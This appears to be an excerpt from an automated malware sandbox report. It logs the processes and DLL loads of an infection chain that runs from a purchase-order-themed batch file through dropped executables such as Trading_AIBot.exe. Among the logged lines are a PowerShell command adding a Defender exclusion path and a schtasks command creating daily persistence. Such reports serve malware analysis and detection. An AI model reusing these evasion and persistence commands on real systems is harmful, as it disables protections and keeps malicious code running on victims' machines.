                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\PO#3_RKG367.bat"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pifJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\cscript.exeSection loaded: msdart.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: fwpuclnt.dllJump to behavior
